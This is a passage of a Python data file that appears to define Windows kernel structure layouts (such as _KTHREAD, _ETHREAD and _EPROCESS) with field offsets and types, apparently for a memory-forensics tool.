'ExAcqResSharedStarveExclusiveWaits' : [ 0x35d4, ['unsigned long']],
'ExAcqResSharedStarveExclusiveNotAcquires' : [ 0x35d8, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveAttempts' : [ 0x35dc, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveAcquiresExclusive' : [ 0x35e0, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveAcquiresShared' : [ 0x35e4, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveAcquiresSharedRecursive' : [ 0x35e8, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveWaits' : [ 0x35ec, ['unsigned long']],
'ExAcqResSharedWaitForExclusiveNotAcquires' : [ 0x35f0, ['unsigned long']],
'ExSetResOwnerPointerExclusive' : [ 0x35f4, ['unsigned long']],
'ExSetResOwnerPointerSharedNew' : [ 0x35f8, ['unsigned long']],
'ExSetResOwnerPointerSharedOld' : [ 0x35fc, ['unsigned long']],
'ExTryToAcqExclusiveAttempts' : [ 0x3600, ['unsigned long']],
'ExTryToAcqExclusiveAcquires' : [ 0x3604, ['unsigned long']],
'ExBoostExclusiveOwner' : [ 0x3608, ['unsigned long']],
'ExBoostSharedOwners' : [ 0x360c, ['unsigned long']],
'ExEtwSynchTrackingNotificationsCount' : [ 0x3610, ['unsigned long']],
'ExEtwSynchTrackingNotificationsAccountedCount' : [ 0x3614, ['unsigned long']],
'Context' : [ 0x3618, ['pointer', ['_CONTEXT']]],
'ContextFlags' : [ 0x361c, ['unsigned long']],
'ExtendedState' : [ 0x3620, ['pointer', ['_XSAVE_AREA']]],
} ],
'_KAPC' : [ 0x30, {
'Type' : [ 0x0, ['unsigned char']],
'SpareByte0' : [ 0x1, ['unsigned char']],
'Size' : [ 0x2, ['unsigned char']],
'SpareByte1' : [ 0x3, ['unsigned char']],
'SpareLong0' : [ 0x4, ['unsigned long']],
'Thread' : [ 0x8, ['pointer', ['_KTHREAD']]],
'ApcListEntry' : [ 0xc, ['_LIST_ENTRY']],
'KernelRoutine' : [ 0x14, ['pointer', ['void']]],
'RundownRoutine' : [ 0x18, ['pointer', ['void']]],
'NormalRoutine' : [ 0x1c, ['pointer', ['void']]],
'NormalContext' : [ 0x20, ['pointer', ['void']]],
'SystemArgument1' : [ 0x24, ['pointer', ['void']]],
'SystemArgument2' : [ 0x28, ['pointer', ['void']]],
'ApcStateIndex' : [ 0x2c, ['unsigned char']],
'ApcMode' : [ 0x2d, ['unsigned char']],
'Inserted' : [ 0x2e, ['unsigned char']],
} ],
'_KTHREAD' : [ 0x200, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
'CycleTime' : [ 0x10, ['unsigned long long']],
'HighCycleTime' : [ 0x18, ['unsigned long']],
'QuantumTarget' : [ 0x20, ['unsigned long long']],
'InitialStack' : [ 0x28, ['pointer', ['void']]],
'StackLimit' : [ 0x2c, ['pointer', ['void']]],
'KernelStack' : [ 0x30, ['pointer', ['void']]],
'ThreadLock' : [ 0x34, ['unsigned long']],
'WaitRegister' : [ 0x38, ['_KWAIT_STATUS_REGISTER']],
'Running' : [ 0x39, ['unsigned char']],
'Alerted' : [ 0x3a, ['array', 2, ['unsigned char']]],
'KernelStackResident' : [ 0x3c, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ReadyTransition' : [ 0x3c, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ProcessReadyQueue' : [ 0x3c, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'WaitNext' : [ 0x3c, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'SystemAffinityActive' : [ 0x3c, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'Alertable' : [ 0x3c, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'GdiFlushActive' : [ 0x3c, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'UserStackWalkActive' : [ 0x3c, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'ApcInterruptRequest' : [ 0x3c, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'ForceDeferSchedule' : [ 0x3c, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'QuantumEndMigrate' : [ 0x3c, ['BitField', dict(start_bit = 10, end_bit = 11, native_type='unsigned long')]],
'UmsDirectedSwitchEnable' : [ 0x3c, ['BitField', dict(start_bit = 11, end_bit = 12, native_type='unsigned long')]],
'TimerActive' : [ 0x3c, ['BitField', dict(start_bit = 12, end_bit = 13, native_type='unsigned long')]],
'Reserved' : [ 0x3c, ['BitField', dict(start_bit = 13, end_bit = 32, native_type='unsigned long')]],
'MiscFlags' : [ 0x3c, ['long']],
'ApcState' : [ 0x40, ['_KAPC_STATE']],
'ApcStateFill' : [ 0x40, ['array', 23, ['unsigned char']]],
'Priority' : [ 0x57, ['unsigned char']],
'NextProcessor' : [ 0x58, ['unsigned long']],
'DeferredProcessor' : [ 0x5c, ['unsigned long']],
'ApcQueueLock' : [ 0x60, ['unsigned long']],
'ContextSwitches' : [ 0x64, ['unsigned long']],
'State' : [ 0x68, ['unsigned char']],
'NpxState' : [ 0x69, ['unsigned char']],
'WaitIrql' : [ 0x6a, ['unsigned char']],
'WaitMode' : [ 0x6b, ['unsigned char']],
'WaitStatus' : [ 0x6c, ['long']],
'WaitBlockList' : [ 0x70, ['pointer', ['_KWAIT_BLOCK']]],
'WaitListEntry' : [ 0x74, ['_LIST_ENTRY']],
'SwapListEntry' : [ 0x74, ['_SINGLE_LIST_ENTRY']],
'Queue' : [ 0x7c, ['pointer', ['_KQUEUE']]],
'WaitTime' : [ 0x80, ['unsigned long']],
'KernelApcDisable' : [ 0x84, ['short']],
'SpecialApcDisable' : [ 0x86, ['short']],
'CombinedApcDisable' : [ 0x84, ['unsigned long']],
'Teb' : [ 0x88, ['pointer', ['void']]],
'Timer' : [ 0x90, ['_KTIMER']],
'AutoAlignment' : [ 0xb8, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'DisableBoost' : [ 0xb8, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'EtwStackTraceApc1Inserted' : [ 0xb8, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'EtwStackTraceApc2Inserted' : [ 0xb8, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'CalloutActive' : [ 0xb8, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'ApcQueueable' : [ 0xb8, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'EnableStackSwap' : [ 0xb8, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'GuiThread' : [ 0xb8, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'UmsPerformingSyscall' : [ 0xb8, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'ReservedFlags' : [ 0xb8, ['BitField', dict(start_bit = 9, end_bit = 32, native_type='unsigned long')]],
'ThreadFlags' : [ 0xb8, ['long']],
'ServiceTable' : [ 0xbc, ['pointer', ['void']]],
'WaitBlock' : [ 0xc0, ['array', 4, ['_KWAIT_BLOCK']]],
'QueueListEntry' : [ 0x120, ['_LIST_ENTRY']],
'TrapFrame' : [ 0x128, ['pointer', ['_KTRAP_FRAME']]],
'FirstArgument' : [ 0x12c, ['pointer', ['void']]],
'CallbackStack' : [ 0x130, ['pointer', ['void']]],
'CallbackDepth' : [ 0x130, ['unsigned long']],
'ApcStateIndex' : [ 0x134, ['unsigned char']],
'BasePriority' : [ 0x135, ['unsigned char']],
'PriorityDecrement' : [ 0x136, ['unsigned char']],
'ForegroundBoost' : [ 0x136, ['BitField', dict(start_bit = 0, end_bit = 4, native_type='unsigned char')]],
'UnusualBoost' : [ 0x136, ['BitField', dict(start_bit = 4, end_bit = 8, native_type='unsigned char')]],
'Preempted' : [ 0x137, ['unsigned char']],
'AdjustReason' : [ 0x138, ['unsigned char']],
'AdjustIncrement' : [ 0x139, ['unsigned char']],
'PreviousMode' : [ 0x13a, ['unsigned char']],
'Saturation' : [ 0x13b, ['unsigned char']],
'SystemCallNumber' : [ 0x13c, ['unsigned long']],
'FreezeCount' : [ 0x140, ['unsigned long']],
'UserAffinity' : [ 0x144, ['_GROUP_AFFINITY']],
'Process' : [ 0x150, ['pointer', ['_KPROCESS']]],
'Affinity' : [ 0x154, ['_GROUP_AFFINITY']],
'IdealProcessor' : [ 0x160, ['unsigned long']],
'UserIdealProcessor' : [ 0x164, ['unsigned long']],
'ApcStatePointer' : [ 0x168, ['array', 2, ['pointer', ['_KAPC_STATE']]]],
'SavedApcState' : [ 0x170, ['_KAPC_STATE']],
'SavedApcStateFill' : [ 0x170, ['array', 23, ['unsigned char']]],
'WaitReason' : [ 0x187, ['unsigned char']],
'SuspendCount' : [ 0x188, ['unsigned char']],
'Spare1' : [ 0x189, ['unsigned char']],
'OtherPlatformFill' : [ 0x18a, ['unsigned char']],
'Win32Thread' : [ 0x18c, ['pointer', ['void']]],
'StackBase' : [ 0x190, ['pointer', ['void']]],
'SuspendApc' : [ 0x194, ['_KAPC']],
'SuspendApcFill0' : [ 0x194, ['array', 1, ['unsigned char']]],
'ResourceIndex' : [ 0x195, ['unsigned char']],
'SuspendApcFill1' : [ 0x194, ['array', 3, ['unsigned char']]],
'QuantumReset' : [ 0x197, ['unsigned char']],
'SuspendApcFill2' : [ 0x194, ['array', 4, ['unsigned char']]],
'KernelTime' : [ 0x198, ['unsigned long']],
'SuspendApcFill3' : [ 0x194, ['array', 36, ['unsigned char']]],
'WaitPrcb' : [ 0x1b8, ['pointer', ['_KPRCB']]],
'SuspendApcFill4' : [ 0x194, ['array', 40, ['unsigned char']]],
'LegoData' : [ 0x1bc, ['pointer', ['void']]],
'SuspendApcFill5' : [ 0x194, ['array', 47, ['unsigned char']]],
'LargeStack' : [ 0x1c3, ['unsigned char']],
'UserTime' : [ 0x1c4, ['unsigned long']],
'SuspendSemaphore' : [ 0x1c8, ['_KSEMAPHORE']],
'SuspendSemaphorefill' : [ 0x1c8, ['array', 20, ['unsigned char']]],
'SListFaultCount' : [ 0x1dc, ['unsigned long']],
'ThreadListEntry' : [ 0x1e0, ['_LIST_ENTRY']],
'MutantListHead' : [ 0x1e8, ['_LIST_ENTRY']],
'SListFaultAddress' : [ 0x1f0, ['pointer', ['void']]],
'ThreadCounters' : [ 0x1f4, ['pointer', ['_KTHREAD_COUNTERS']]],
'XStateSave' : [ 0x1f8, ['pointer', ['_XSTATE_SAVE']]],
} ],
'_KSPIN_LOCK_QUEUE' : [ 0x8, {
'Next' : [ 0x0, ['pointer', ['_KSPIN_LOCK_QUEUE']]],
'Lock' : [ 0x4, ['pointer', ['unsigned long']]],
} ],
'_FAST_MUTEX' : [ 0x20, {
'Count' : [ 0x0, ['long']],
'Owner' : [ 0x4, ['pointer', ['_KTHREAD']]],
'Contention' : [ 0x8, ['unsigned long']],
'Event' : [ 0xc, ['_KEVENT']],
'OldIrql' : [ 0x1c, ['unsigned long']],
} ],
'_KEVENT' : [ 0x10, {
'Header' : [ 0x0, ['_DISPATCHER_HEADER']],
} ],
'_SLIST_HEADER' : [ 0x8, {
'Alignment' : [ 0x0, ['unsigned long long']],
'Next' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Depth' : [ 0x4, ['unsigned short']],
'Sequence' : [ 0x6, ['unsigned short']],
} ],
'_LOOKASIDE_LIST_EX' : [ 0x48, {
'L' : [ 0x0, ['_GENERAL_LOOKASIDE_POOL']],
} ],
'_NPAGED_LOOKASIDE_LIST' : [ 0xc0, {
'L' : [ 0x0, ['_GENERAL_LOOKASIDE']],
'Lock__ObsoleteButDoNotDelete' : [ 0x80, ['unsigned long']],
} ],
'_PAGED_LOOKASIDE_LIST' : [ 0xc0, {
'L' : [ 0x0, ['_GENERAL_LOOKASIDE']],
'Lock__ObsoleteButDoNotDelete' : [ 0x80, ['_FAST_MUTEX']],
} ],
'_QUAD' : [ 0x8, {
'UseThisFieldToCopy' : [ 0x0, ['long long']],
'DoNotUseThisField' : [ 0x0, ['double']],
} ],
'_IO_STATUS_BLOCK' : [ 0x8, {
'Status' : [ 0x0, ['long']],
'Pointer' : [ 0x0, ['pointer', ['void']]],
'Information' : [ 0x4, ['unsigned long']],
} ],
'_EX_PUSH_LOCK' : [ 0x4, {
'Locked' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Waiting' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'Waking' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'MultipleShared' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'Shared' : [ 0x0, ['BitField', dict(start_bit = 4, end_bit = 32, native_type='unsigned long')]],
'Value' : [ 0x0, ['unsigned long']],
'Ptr' : [ 0x0, ['pointer', ['void']]],
} ],
'_PROCESSOR_NUMBER' : [ 0x4, {
'Group' : [ 0x0, ['unsigned short']],
'Number' : [ 0x2, ['unsigned char']],
'Reserved' : [ 0x3, ['unsigned char']],
} ],
'_EX_PUSH_LOCK_CACHE_AWARE' : [ 0x80, {
'Locks' : [ 0x0, ['array', 32, ['pointer', ['_EX_PUSH_LOCK']]]],
} ],
'_PP_LOOKASIDE_LIST' : [ 0x8, {
'P' : [ 0x0, ['pointer', ['_GENERAL_LOOKASIDE']]],
'L' : [ 0x4, ['pointer', ['_GENERAL_LOOKASIDE']]],
} ],
'_GENERAL_LOOKASIDE' : [ 0x80, {
'ListHead' : [ 0x0, ['_SLIST_HEADER']],
'SingleListHead' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'Depth' : [ 0x8, ['unsigned short']],
'MaximumDepth' : [ 0xa, ['unsigned short']],
'TotalAllocates' : [ 0xc, ['unsigned long']],
'AllocateMisses' : [ 0x10, ['unsigned long']],
'AllocateHits' : [ 0x10, ['unsigned long']],
'TotalFrees' : [ 0x14, ['unsigned long']],
'FreeMisses' : [ 0x18, ['unsigned long']],
'FreeHits' : [ 0x18, ['unsigned long']],
'Type' : [ 0x1c, ['Enumeration', dict(target = 'long', choices = {0: 'NonPagedPool', 1: 'PagedPool', 2: 'NonPagedPoolMustSucceed', 3: 'DontUseThisType', 4: 'NonPagedPoolCacheAligned', 5: 'PagedPoolCacheAligned', 6: 'NonPagedPoolCacheAlignedMustS', 7: 'MaxPoolType', 34: 'NonPagedPoolMustSucceedSession', 35: 'DontUseThisTypeSession', 32: 'NonPagedPoolSession', 36: 'NonPagedPoolCacheAlignedSession', 33: 'PagedPoolSession', 38: 'NonPagedPoolCacheAlignedMustSSession', 37: 'PagedPoolCacheAlignedSession'})]],
'Tag' : [ 0x20, ['unsigned long']],
'Size' : [ 0x24, ['unsigned long']],
'AllocateEx' : [ 0x28, ['pointer', ['void']]],
'Allocate' : [ 0x28, ['pointer', ['void']]],
'FreeEx' : [ 0x2c, ['pointer', ['void']]],
'Free' : [ 0x2c, ['pointer', ['void']]],
'ListEntry' : [ 0x30, ['_LIST_ENTRY']],
'LastTotalAllocates' : [ 0x38, ['unsigned long']],
'LastAllocateMisses' : [ 0x3c, ['unsigned long']],
'LastAllocateHits' : [ 0x3c, ['unsigned long']],
'Future' : [ 0x40, ['array', 2, ['unsigned long']]],
} ],
'_EX_FAST_REF' : [ 0x4, {
'Object' : [ 0x0, ['pointer', ['void']]],
'RefCnt' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned long')]],
'Value' : [ 0x0, ['unsigned long']],
} ],
'_EX_PUSH_LOCK_WAIT_BLOCK' : [ 0x30, {
'WakeEvent' : [ 0x0, ['_KEVENT']],
'Next' : [ 0x10, ['pointer', ['_EX_PUSH_LOCK_WAIT_BLOCK']]],
'Last' : [ 0x14, ['pointer', ['_EX_PUSH_LOCK_WAIT_BLOCK']]],
'Previous' : [ 0x18, ['pointer', ['_EX_PUSH_LOCK_WAIT_BLOCK']]],
'ShareCount' : [ 0x1c, ['long']],
'Flags' : [ 0x20, ['long']],
} ],
'_ETHREAD' : [ 0x2b8, {
'Tcb' : [ 0x0, ['_KTHREAD']],
'CreateTime' : [ 0x200, ['_LARGE_INTEGER']],
'ExitTime' : [ 0x208, ['_LARGE_INTEGER']],
'KeyedWaitChain' : [ 0x208, ['_LIST_ENTRY']],
'ExitStatus' : [ 0x210, ['long']],
'PostBlockList' : [ 0x214, ['_LIST_ENTRY']],
'ForwardLinkShadow' : [ 0x214, ['pointer', ['void']]],
'StartAddress' : [ 0x218, ['pointer', ['void']]],
'TerminationPort' : [ 0x21c, ['pointer', ['_TERMINATION_PORT']]],
'ReaperLink' : [ 0x21c, ['pointer', ['_ETHREAD']]],
'KeyedWaitValue' : [ 0x21c, ['pointer', ['void']]],
'ActiveTimerListLock' : [ 0x220, ['unsigned long']],
'ActiveTimerListHead' : [ 0x224, ['_LIST_ENTRY']],
'Cid' : [ 0x22c, ['_CLIENT_ID']],
'KeyedWaitSemaphore' : [ 0x234, ['_KSEMAPHORE']],
'AlpcWaitSemaphore' : [ 0x234, ['_KSEMAPHORE']],
'ClientSecurity' : [ 0x248, ['_PS_CLIENT_SECURITY_CONTEXT']],
'IrpList' : [ 0x24c, ['_LIST_ENTRY']],
'TopLevelIrp' : [ 0x254, ['unsigned long']],
'DeviceToVerify' : [ 0x258, ['pointer', ['_DEVICE_OBJECT']]],
'CpuQuotaApc' : [ 0x25c, ['pointer', ['_PSP_CPU_QUOTA_APC']]],
'Win32StartAddress' : [ 0x260, ['pointer', ['void']]],
'LegacyPowerObject' : [ 0x264, ['pointer', ['void']]],
'ThreadListEntry' : [ 0x268, ['_LIST_ENTRY']],
'RundownProtect' : [ 0x270, ['_EX_RUNDOWN_REF']],
'ThreadLock' : [ 0x274, ['_EX_PUSH_LOCK']],
'ReadClusterSize' : [ 0x278, ['unsigned long']],
'MmLockOrdering' : [ 0x27c, ['long']],
'CrossThreadFlags' : [ 0x280, ['unsigned long']],
'Terminated' : [ 0x280, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ThreadInserted' : [ 0x280, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'HideFromDebugger' : [ 0x280, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ActiveImpersonationInfo' : [ 0x280, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'SystemThread' : [ 0x280, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'HardErrorsAreDisabled' : [ 0x280, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned long')]],
'BreakOnTermination' : [ 0x280, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned long')]],
'SkipCreationMsg' : [ 0x280, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'SkipTerminationMsg' : [ 0x280, ['BitField', dict(start_bit = 8, end_bit = 9, native_type='unsigned long')]],
'CopyTokenOnOpen' : [ 0x280, ['BitField', dict(start_bit = 9, end_bit = 10, native_type='unsigned long')]],
'ThreadIoPriority' : [ 0x280, ['BitField', dict(start_bit = 10, end_bit = 13, native_type='unsigned long')]],
'ThreadPagePriority' : [ 0x280, ['BitField', dict(start_bit = 13, end_bit = 16, native_type='unsigned long')]],
'RundownFail' : [ 0x280, ['BitField', dict(start_bit = 16, end_bit = 17, native_type='unsigned long')]],
'NeedsWorkingSetAging' : [ 0x280, ['BitField', dict(start_bit = 17, end_bit = 18, native_type='unsigned long')]],
'SameThreadPassiveFlags' : [ 0x284, ['unsigned long']],
'ActiveExWorker' : [ 0x284, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ExWorkerCanWaitUser' : [ 0x284, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'MemoryMaker' : [ 0x284, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ClonedThread' : [ 0x284, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'KeyedEventInUse' : [ 0x284, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'RateApcState' : [ 0x284, ['BitField', dict(start_bit = 5, end_bit = 7, native_type='unsigned long')]],
'SelfTerminate' : [ 0x284, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned long')]],
'SameThreadApcFlags' : [ 0x288, ['unsigned long']],
'Spare' : [ 0x288, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'StartAddressInvalid' : [ 0x288, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'EtwPageFaultCalloutActive' : [ 0x288, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'OwnsProcessWorkingSetExclusive' : [ 0x288, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'OwnsProcessWorkingSetShared' : [ 0x288, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'OwnsSystemCacheWorkingSetExclusive' : [ 0x288, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'OwnsSystemCacheWorkingSetShared' : [ 0x288, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'OwnsSessionWorkingSetExclusive' : [ 0x288, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'OwnsSessionWorkingSetShared' : [ 0x289, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'OwnsProcessAddressSpaceExclusive' : [ 0x289, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'OwnsProcessAddressSpaceShared' : [ 0x289, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'SuppressSymbolLoad' : [ 0x289, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'Prefetching' : [ 0x289, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'OwnsDynamicMemoryShared' : [ 0x289, ['BitField', dict(start_bit = 5, end_bit = 6, native_type='unsigned char')]],
'OwnsChangeControlAreaExclusive' : [ 0x289, ['BitField', dict(start_bit = 6, end_bit = 7, native_type='unsigned char')]],
'OwnsChangeControlAreaShared' : [ 0x289, ['BitField', dict(start_bit = 7, end_bit = 8, native_type='unsigned char')]],
'OwnsPagedPoolWorkingSetExclusive' : [ 0x28a, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'OwnsPagedPoolWorkingSetShared' : [ 0x28a, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'OwnsSystemPtesWorkingSetExclusive' : [ 0x28a, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'OwnsSystemPtesWorkingSetShared' : [ 0x28a, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'TrimTrigger' : [ 0x28a, ['BitField', dict(start_bit = 4, end_bit = 6, native_type='unsigned char')]],
'Spare1' : [ 0x28a, ['BitField', dict(start_bit = 6, end_bit = 8, native_type='unsigned char')]],
'PriorityRegionActive' : [ 0x28b, ['unsigned char']],
'CacheManagerActive' : [ 0x28c, ['unsigned char']],
'DisablePageFaultClustering' : [ 0x28d, ['unsigned char']],
'ActiveFaultCount' : [ 0x28e, ['unsigned char']],
'LockOrderState' : [ 0x28f, ['unsigned char']],
'AlpcMessageId' : [ 0x290, ['unsigned long']],
'AlpcMessage' : [ 0x294, ['pointer', ['void']]],
'AlpcReceiveAttributeSet' : [ 0x294, ['unsigned long']],
'AlpcWaitListEntry' : [ 0x298, ['_LIST_ENTRY']],
'CacheManagerCount' : [ 0x2a0, ['unsigned long']],
'IoBoostCount' : [ 0x2a4, ['unsigned long']],
'IrpListLock' : [ 0x2a8, ['unsigned long']],
'ReservedForSynchTracking' : [ 0x2ac, ['pointer', ['void']]],
'CmCallbackListHead' : [ 0x2b0, ['_SINGLE_LIST_ENTRY']],
} ],
'_EPROCESS' : [ 0x2c0, {
'Pcb' : [ 0x0, ['_KPROCESS']],
'ProcessLock' : [ 0x98, ['_EX_PUSH_LOCK']],
'CreateTime' : [ 0xa0, ['_LARGE_INTEGER']],
'ExitTime' : [ 0xa8, ['_LARGE_INTEGER']],
'RundownProtect' : [ 0xb0, ['_EX_RUNDOWN_REF']],
'UniqueProcessId' : [ 0xb4, ['pointer', ['void']]],
'ActiveProcessLinks' : [ 0xb8, ['_LIST_ENTRY']],
'ProcessQuotaUsage' : [ 0xc0, ['array', 2, ['unsigned long']]],
'ProcessQuotaPeak' : [ 0xc8, ['array', 2, ['unsigned long']]],
'CommitCharge' : [ 0xd0, ['unsigned long']],
'QuotaBlock' : [ 0xd4, ['pointer', ['_EPROCESS_QUOTA_BLOCK']]],
'CpuQuotaBlock' : [ 0xd8, ['pointer', ['_PS_CPU_QUOTA_BLOCK']]],
'PeakVirtualSize' : [ 0xdc, ['unsigned long']],
'VirtualSize' : [ 0xe0, ['unsigned long']],
'SessionProcessLinks' : [ 0xe4, ['_LIST_ENTRY']],
'DebugPort' : [ 0xec, ['pointer', ['void']]],
'ExceptionPortData' : [ 0xf0, ['pointer', ['void']]],
'ExceptionPortValue' : [ 0xf0, ['unsigned long']],
'ExceptionPortState' : [ 0xf0, ['BitField', dict(start_bit = 0, end_bit = 3, native_type='unsigned long')]],
'ObjectTable' : [ 0xf4, ['pointer', ['_HANDLE_TABLE']]],
'Token' : [ 0xf8, ['_EX_FAST_REF']],
'WorkingSetPage' : [ 0xfc, ['unsigned long']],
'AddressCreationLock' : [ 0x100, ['_EX_PUSH_LOCK']],
'RotateInProgress' : [ 0x104, ['pointer', ['_ETHREAD']]],
'ForkInProgress' : [ 0x108, ['pointer', ['_ETHREAD']]],
'HardwareTrigger' : [ 0x10c, ['unsigned long']],
'PhysicalVadRoot' : [ 0x110, ['pointer', ['_MM_AVL_TABLE']]],
'CloneRoot' : [ 0x114, ['pointer', ['void']]],
'NumberOfPrivatePages' : [ 0x118, ['unsigned long']],
'NumberOfLockedPages' : [ 0x11c, ['unsigned long']],
'Win32Process' : [ 0x120, ['pointer', ['void']]],
'Job' : [ 0x124, ['pointer', ['_EJOB']]],
'SectionObject' : [ 0x128, ['pointer', ['void']]],
'SectionBaseAddress' : [ 0x12c, ['pointer', ['void']]],
'Cookie' : [ 0x130, ['unsigned long']],
'Spare8' : [ 0x134, ['unsigned long']],
'WorkingSetWatch' : [ 0x138, ['pointer', ['_PAGEFAULT_HISTORY']]],
'Win32WindowStation' : [ 0x13c, ['pointer', ['void']]],
'InheritedFromUniqueProcessId' : [ 0x140, ['pointer', ['void']]],
'LdtInformation' : [ 0x144, ['pointer', ['void']]],
'VdmObjects' : [ 0x148, ['pointer', ['void']]],
'ConsoleHostProcess' : [ 0x14c, ['unsigned long']],
'DeviceMap' : [ 0x150, ['pointer', ['void']]],
'EtwDataSource' : [ 0x154, ['pointer', ['void']]],
'FreeTebHint' : [ 0x158, ['pointer', ['void']]],
'PageDirectoryPte' : [ 0x160, ['_HARDWARE_PTE']],
'Filler' : [ 0x160, ['unsigned long long']],
'Session' : [ 0x168, ['pointer', ['void']]],
'ImageFileName' : [ 0x16c, ['array', 15, ['unsigned char']]],
'PriorityClass' : [ 0x17b, ['unsigned char']],
'JobLinks' : [ 0x17c, ['_LIST_ENTRY']],
'LockedPagesList' : [ 0x184, ['pointer', ['void']]],
'ThreadListHead' : [ 0x188, ['_LIST_ENTRY']],
'SecurityPort' : [ 0x190, ['pointer', ['void']]],
'PaeTop' : [ 0x194, ['pointer', ['void']]],
'ActiveThreads' : [ 0x198, ['unsigned long']],
'ImagePathHash' : [ 0x19c, ['unsigned long']],
'DefaultHardErrorProcessing' : [ 0x1a0, ['unsigned long']],
'LastThreadExitStatus' : [ 0x1a4, ['long']],
'Peb' : [ 0x1a8, ['pointer', ['_PEB']]],
'PrefetchTrace' : [ 0x1ac, ['_EX_FAST_REF']],
'ReadOperationCount' : [ 0x1b0, ['_LARGE_INTEGER']],
'WriteOperationCount' : [ 0x1b8, ['_LARGE_INTEGER']],
'OtherOperationCount' : [ 0x1c0, ['_LARGE_INTEGER']],
'ReadTransferCount' : [ 0x1c8, ['_LARGE_INTEGER']],
'WriteTransferCount' : [ 0x1d0, ['_LARGE_INTEGER']],
'OtherTransferCount' : [ 0x1d8, ['_LARGE_INTEGER']],
'CommitChargeLimit' : [ 0x1e0, ['unsigned long']],
'CommitChargePeak' : [ 0x1e4, ['unsigned long']],
'AweInfo' : [ 0x1e8, ['pointer', ['void']]],
'SeAuditProcessCreationInfo' : [ 0x1ec, ['_SE_AUDIT_PROCESS_CREATION_INFO']],
'Vm' : [ 0x1f0, ['_MMSUPPORT']],
'MmProcessLinks' : [ 0x25c, ['_LIST_ENTRY']],
'HighestUserAddress' : [ 0x264, ['pointer', ['void']]],
'ModifiedPageCount' : [ 0x268, ['unsigned long']],
'Flags2' : [ 0x26c, ['unsigned long']],
'JobNotReallyActive' : [ 0x26c, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'AccountingFolded' : [ 0x26c, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'NewProcessReported' : [ 0x26c, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
